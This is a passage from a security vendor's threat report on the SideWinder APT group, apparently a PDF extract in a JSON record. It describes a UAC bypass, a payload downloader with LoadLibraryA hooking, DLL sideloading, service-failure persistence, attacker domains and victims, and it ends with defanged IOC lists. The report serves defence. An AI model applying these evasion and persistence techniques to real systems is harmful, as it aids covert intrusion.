was\r\nprobably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a\r\nbypass technique that abuses the legitimate Windows program slui.exe. It is used to activate and register the operating\r\nsystem with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique was described in\r\n2020 and is based on the modification of specific Windows registry keys. Based on the created values, we believe the\r\nattacker based their code on a proof of concept available on GitHub.\r\nThe module still includes two resources that are used exclusively by this code:\r\nVmComputeAgent\r\nVmComputeAgent_exe\r\nThe first is a very simple program, packed with ConfuserEx, which starts a new process:\r\n“%systemroot%\\System32\\slui.exe” as administrator.\r\nThe second is an XML manifest.\r\nDownloader\r\nThe library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.\r\nhxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111\r\nname=inpl64\r\nhxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4d\r\nname=stg64\r\nhxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955\r\nname=rflr\r\nUnfortunately, we were not able to get a valid response from the server, but considering the “name” variable inside the URL\r\nand the logic of the various components observed during the investigation, we can infer that each “name” value probably\r\nalso indicates the real purpose of the file.\r\nVariable Description\r\n?name=inpl64 implant for 64-bit architectures\r\n?name=stg64 stager for 64-bit architectures\r\n?name=rlfr reflective loader ???\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 18 of 26\n\nThe downloaded data are combined into a final payload with the following structure:\r\nstg64 + \u003csize of rlfr+inpl64+8\u003e + rlfr + \u003cdelimiter\u003e + inpl64\r\nFinally, the malware loads the payload into memory and executes it. The execution method is selected according to the\r\nversion of Windows.\r\nOn systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies\r\nthe previously generated payload to the new region, and directly calls the first address.\r\nOn newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data”\r\nsection to the final payload.\r\nThe malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution\r\nflow to the small shellcode copied in the allocated region.\r\nFinally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.\r\nSnippet of reversed code used to hook LoadLibrary and run the payload\r\nThe small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes\r\nmatch, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.\r\nShellcode embedded in the downloader image\r\nInstallers\r\nDuring the investigation we found two more components, which are installers used to deploy the StealerBot on the systems.\r\nWe didn’t observe them during the infection chain. They are probably used to install new versions of the malware or deploy\r\nthe malware in different contexts on the same machine. For example, to infect another user.\r\nInstallerPayload\r\nThe first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader”\r\ncomponent observed in the UAC bypass module. The library contains different payloads that are joined together at runtime\r\nand injected into the remote “spoolsv.exe” process.\r\nThe injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional\r\ncomponents and maintain their persistence by creating a new Windows service.\r\nThe malware is configured to download the files from a predefined URL using WinHTTP.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 19 of 26\n\nhxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E\r\nF0mo673/1/1706084656128/x3l8o/2c821e\r\nThe specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is\r\ndownloaded to a specific location:\r\nVariable Destination file path\r\n?name=bp\r\n%systemroot%\\srclinks\\%RANDOM_NAME%\r\nExample name: VacPWtys\r\n?name=ps\r\n%systemroot%\\srclinks\\write.exe\r\nor\r\n%systemroot%\\srclinks\\fsquirt.exe\r\n?name=dj\r\n%systemroot%\\srclinks\\devobj.dll\r\nor\r\n%systemroot%\\srclinks\\propsys.dll\r\n?name=v3d %systemroot%\\srclinks\\vm3dservice.exe\r\n?name=svh %systemroot%\\srclinks\\winmm.dll\r\n?name=fsq\r\n%systemroot%\\srclinks\\write.exe\r\nor\r\n%systemroot%\\srclinks\\fsquirt.exe\r\nThe specific filename changes according to the Windows version.\r\nIf the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following files:\r\n%systemroot%\\srclinks\\write.exe\r\n%systemroot%\\srclinks\\propsys.dll\r\n%systemroot%\\srclinks\\write.exe.config\r\n%systemroot%\\srclinks\\vm3dservice.exe\r\n%systemroot%\\srclinks\\winmm.dll\r\nOtherwise:\r\n%systemroot%\\srclinks\\fsquirt.exe\r\n%systemroot%\\srclinks\\devobj.dll\r\n%systemroot%\\srclinks\\fsquirt.exe.config\r\n%systemroot%\\srclinks\\vm3dservice.exe\r\n%systemroot%\\srclinks\\winmm.dll\r\nThe malware also creates a new Windows service named \"srclink\" to ensure that the downloaded files can start\r\nautomatically when the system restarts.\r\nThe service is configured to start automatically and run the following program:\r\nC:\\WINDOWS\\srclinks\\vm3dservice.exe\r\nThe file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious\r\n\"winmm.dll\" library.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 20 of 26\n\nThis is a library developed in C++ and named \"SyncBotServiceHijack.dll\" that exports all the functions normally exported\r\nby the legitimate “winmm.dll” library located in the system32 directory.\r\nAll the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.\r\nInstructions used to raise an error\r\nThis is part of the persistence mechanism created by the attacker. The malicious Windows service created by the\r\nInstallerPayload component is configured to launch another program if the service fails.\r\nWindows service properties\r\nWe may presume that the attacker uses this trick to bypass detection and sandbox technologies.\r\nIn this case, the service starts another program previously dropped by the malware:\r\n%systemroot%\\srclinks\\fsquirt.exe\r\nThis is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. This utility is\r\nused by the attacker to sideload another malicious library, \"devobj.dll\", which is a variant of the Backdoor loader module.\r\nInstallerPayload_NET\r\nThis is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++.\r\nThe main difference is that this malware embeds most of the files as resources.\r\nLibrary Hash Description\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 21 of 26\n\ndevobjLoadAppDllx32 a7aad43a572f44f8c008b9885cf936cf “Backdoor loader module” dropped as devobj.dll\r\nfsquirt ba54013cad72cd79d2b7843602835ed3 Legitimate program signed by Microsoft\r\nManage f840c721e533c05d152d2bc7bf1bc165 Program to hijack Windows service\r\nmanifest d3136d7151f60ec41a370f4743c2983b XML manifest\r\npropsysLoadAppDllx32 56e7d6b5c61306096a5ba22ebbfb454e\r\n“Backdoor loader module” dropped as\r\npropsys.dll\r\nSimilar to InstallerPayload, the malware creates a new service that launches Manage.exe. Manage.exe is a simple program\r\nthat sleeps for 20 seconds and then generates an exception.\r\nThe service is configured to launch another program in case of failure. The second program, \"fsquirt.exe\" or \"write.exe\", is a\r\nlegitimate application that is used to sideload a malicious library, the Backdoor loader module component.\r\nThe encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a\r\nURL embedded in the code:\r\nhxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572\r\nThe received data are stored in a file with a random name and no extension.\r\nInfrastructure\r\nThe attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically\r\nconfigure the malware to communicate with FQDN using specific subdomains with names that appear legitimate and are\r\nprobably selected for relevance to the target. For example, the following is a small subset of subdomains used by the\r\nattacker.\r\nnextgen[.]paknavy-govpk[.]net\r\npremier[.]moittpk[.]org\r\ncabinet-division-pk[.]fia-gov[.]com\r\nnavy-lk[.]direct888[.]net\r\nsrilanka-navy[.]lforvk[.]com\r\nportdjibouti[.]pmd-office[.]org\r\nportdedjibouti[.]shipping-policy[.]info\r\nmofa-gov-sa[.]direct888[.]net\r\nmod-gov-bd[.]direct888[.]net\r\nmmcert-org-mm[.]donwloaded[.]com\r\nopmcm-gov-np[.]fia-gov[.]net\r\nEach domain and its related subdomains are resolved with a dedicated IP address. The C2s are hosted on a VPS used\r\nexclusively by the attacker, but rented from different providers for a very short time. The attacker uses different service\r\nproviders, but has a preference for HZ Hosting, BlueVPS, and GhostNET.\r\nVictims\r\nSideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal,\r\nPakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.\r\nTargeted sectors include government and military entities, logistics, infrastructure and telecommunications companies,\r\nfinancial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following\r\ncountries: Afghanistan, France, China, India, Indonesia and Morocco.\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 22 of 26\n\nAttribution\r\nWe attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in\r\nthese attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous\r\nSideWinder activity:\r\nThe use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit\r\nCVE-2017-11882.\r\nThe naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of\r\nsignificance to the targets.\r\nThe .NET Downloader component and the Backdoor loader module are similar to those described in the past.\r\nLast but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.\r\n***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence\r\nReporting Service. Contact: intelreports@kaspersky.com.\r\nIOCs\r\nMalicious documents\r\n6cf6d55a3968e2176db2bba2134bbe94\r\nc87eb71ff038df7b517644fa5c097eac\r\n8202209354ece5c53648c52bdbd064f0\r\n5cc784afb69c153ab325266e8a7afaf4\r\n3a6916192106ae3ac7e55bd357bc5eee\r\n54aadadcf77dec53b2566fe61b034384\r\n8f83d19c2efc062e8983bce83062c9b6\r\n8e8b61e5fb6f6792f2bee0ec947f1989\r\n86eeb037f5669bff655de1e08199a554\r\n1c36177ac4423129e301c5a40247f180\r\n873079cd3e635adb609c38af71bad702\r\n423e150d91edc568546f0d2f064a8bf1\r\n4a5e818178f9b2dc48839a5dbe0e3cc1\r\nRtf\r\n26aa30505d8358ebeb5ee15aecb1cbb0\r\n3233db78e37302b47436b550a21cdaf9\r\n8d7c43913eba26f96cd656966c1e26d5\r\nd0d1fba6bb7be933889ace0d6955a1d7\r\ne706fc65f433e54538a3dbb1c359d75f\r\nLnk\r\n412b6ac53aeadb08449e41dccffb1abe දිනදි සං ශෝ ධන කර ගැ නිම .lnk\r\n2f4ba98dcd45e59fca488f436ab13501 Special Envoy Speech at NCA.jpg .lnk\r\nBackdoor Loader\r\npropsys.dll\r\nb69867ee5b9581687cef96e873b775ff\r\nc3ce4094b3411060928143f63701aa2e\r\ne1bdfa55227d37a71cdc248dc9512296\r\nea4b3f023bac3ad1a982cace9a6eafc3\r\n44dbdd87b60c20b22d2a7926ad2d7bea\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 23 of 26\n\n7e97cbf25eef7fc79828c033049822af\r\nvsstrace.dll\r\n101a63ecdd8c68434c665bf2b1d3ffc7\r\nd885df399fc9f6c80e2df0c290414c2f\r\n92dd91a5e3dfb6260e13c8033b729e03\r\n515d2d6f91ba4b76847301855dfc0e83\r\n3ede84d84c02aa7483eb734776a20dea\r\n2011658436a7b04935c06f59a5db7161\r\nStealerBot\r\n3a036a1846bfeceb615101b10c7c910e          Orchestrator\r\n47f51c7f31ab4a0d91a0f4c07b2f99d7         Keylogger\r\nf3058ac120a2ae7807f36899e27784ea       Screenshot grabber\r\n0fbb71525d65f0196a9bfbffea285b18          File stealer\r\n1ed7ad166567c46f71dc703e55d31c7a         Live Console\r\n2f0e150e3d6dbb1624c727d1a641e754         RDP Credential Stealer\r\nbf16760ee49742225fdb2a73c1bd83c7         RDP Credential Stealer – Injected library\r\nmscorlib.dll\r\nb3650a88a50108873fc45ad3c249671a       Token Grabber\r\n4c40fcb2a12f171533fc070464db96d1          Credential Phisher – Injected library\r\neef9c0a9e364b4516a83a92592ffc831         UACBypass\r\nSyncBotServiceHijack.dll\r\n1be93704870afd0b22a4475014f199c3\r\nService Hijack\r\nf840c721e533c05d152d2bc7bf1bc165 Manage.exe\r\nBackdoor Loader devobj.dll\r\n5718c0d69939284ce4f6e0ce580958df\r\nDomains and IPs\r\n126-com[.]live\r\n163inc[.]com\r\nafmat[.]tech\r\nalit[.]live\r\naliyum[.]tech\r\naliyumm[.]tech\r\nasyn[.]info\r\nausibedu[.]org\r\nbol-south[.]org\r\ncnsa-gov[.]org\r\ncolot[.]info\r\ncomptes[.]tech\r\ncondet[.]org\r\nconft[.]live\r\ndafpak[.]org\r\ndecoty[.]tech\r\ndefenec[.]net\r\ndefpak[.]org\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 24 of 26\n\ndetru[.]info\r\ndgps-govpk[.]co\r\ndgps-govpk[.]com\r\ndinfed[.]co\r\ndirctt88[.]co\r\ndirctt88[.]net\r\ndirect888[.]net\r\ndirect88[.]co\r\ndirectt888[.]com\r\ndonwload-file[.]com\r\ndonwloaded[.]com\r\ndonwloaded[.]net\r\ndowmload[.]net\r\ndownld[.]net\r\ndownload-file[.]net\r\ndownloadabledocx[.]com\r\ndynat[.]tech\r\ndytt88[.]org\r\ne1ix[.]mov\r\ne1x[.]tech\r\nfia-gov[.]com\r\nfia-gov[.]net\r\ngov-govpk[.]info\r\ngovpk[.]info\r\ngovpk[.]net\r\ngrouit[.]tech\r\ngtrec[.]info\r\nhealththebest[.]com\r\njmicc[.]xyz\r\nkernet[.]info\r\nkretic[.]info\r\nlforvk[.]com\r\nmfa-gov[.]info\r\nmfa-gov[.]net\r\nmfa-govt[.]net\r\nmfacom[.]org\r\nmfagov[.]org\r\nmfas[.]pro\r\nmitlec[.]site\r\nmod-gov-pk[.]live\r\nmofa[.]email\r\nmofagovs[.]org\r\nmoittpk[.]net\r\nmoittpk[.]org\r\nmshealthcheck[.]live\r\nnactagovpk[.]org\r\nnavy-mil[.]co\r\nnewmofa[.]com\r\nnewoutlook[.]live\r\nnopler[.]live\r\nntcpak[.]live\r\nntcpak[.]org\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 25 of 26\n\nntcpk[.]info\r\nntcpk[.]net\r\nnumpy[.]info\r\nnumzy[.]net\r\nnventic[.]info\r\noffice-drive[.]live\r\npafgovt[.]com\r\npaknavy-gov[.]org\r\npaknavy-govpk[.]info\r\npaknavy-govpk[.]net\r\npdfrdr-update[.]com\r\npdfrdr-update[.]info\r\npmd-office[.]com\r\npmd-office[.]live\r\npmd-office[.]org\r\nptcl-net[.]com\r\nscrabt[.]tech\r\nshipping-policy[.]info\r\nsjfu-edu[.]co\r\nsupport-update[.]info\r\ntazze[.]co\r\ntex-ideas[.]info\r\ntni-mil[.]com\r\ntsinghua-edu[.]tech\r\ntumet[.]info\r\nu1x[.]co\r\nujsen[.]net\r\nupdate-govpk[.]co\r\nupdtesession[.]online\r\nwidge[.]info\r\nSource: https://securelist.com/sidewinder-apt/114089/\r\nhttps://securelist.com/sidewinder-apt/114089/\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://securelist.com/sidewinder-apt/114089/" ], "report_names": [ "114089" ], "threat_actors": [ { "id": "3cc6c262-df23-4075-a93f-b496e8908eb2", "created_at": "2022-10-25T16:07:23.682239Z", "updated_at": "2026-04-10T02:00:04.708878Z", "deleted_at": null, "main_name": "GhostNet", "aliases": [ "GhostNet", "Snooping Dragon" ], "source_name": "ETDA:GhostNet", "tools": [ "AngryRebel", "Farfli", "Gh0st RAT", "Gh0stnet", "Ghost RAT", "Ghostnet", "Moudour", "Mydoor", "PCRat", "Remosh", "TOM-Skype" ], "source_id": "ETDA", "reports": null }, { "id": "e91dae30-a513-4fb1-aace-4457466313b3", "created_at": "2023-01-06T13:46:38.974913Z", "updated_at": "2026-04-10T02:00:03.168521Z", "deleted_at": null, "main_name": "GhostNet", "aliases": [ "Snooping Dragon" ], "source_name": "MISPGALAXY:GhostNet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e", "created_at": "2023-01-06T13:46:39.080551Z", "updated_at": "2026-04-10T02:00:03.206572Z", "deleted_at": null, "main_name": "RAZOR TIGER", "aliases": [ "APT-C-17", "T-APT-04", "SideWinder" ], "source_name": "MISPGALAXY:RAZOR TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b9fc913-06c6-4432-8c58-86a3ac614564", "created_at": "2022-10-25T16:07:24.185236Z", "updated_at": "2026-04-10T02:00:04.893541Z", "deleted_at": null, "main_name": "SideWinder", "aliases": [ "APT-C-17", "APT-Q-39", "BabyElephant", "G0121", "GroupA21", "HN2", "Hardcore Nationalist", "Rattlesnake", "Razor Tiger", "SideWinder", "T-APT-04" ], "source_name": "ETDA:SideWinder", "tools": [ "BroStealer", "Capriccio RAT", "callCam" ], "source_id": "ETDA", "reports": null }, { "id": "173f1641-36e3-4bce-9834-c5372468b4f7", "created_at": "2022-10-25T15:50:23.349637Z", "updated_at": "2026-04-10T02:00:05.3486Z", "deleted_at": null, "main_name": "Sidewinder", "aliases": [ "Sidewinder", "T-APT-04" ], "source_name": "MITRE:Sidewinder", "tools": [ "Koadic" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434942, "ts_updated_at": 1775792240, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cd734a8f8f6349cf28a379073393fcb8747f4b22.pdf", "text": "https://archive.orkl.eu/cd734a8f8f6349cf28a379073393fcb8747f4b22.txt", "img": "https://archive.orkl.eu/cd734a8f8f6349cf28a379073393fcb8747f4b22.jpg" } }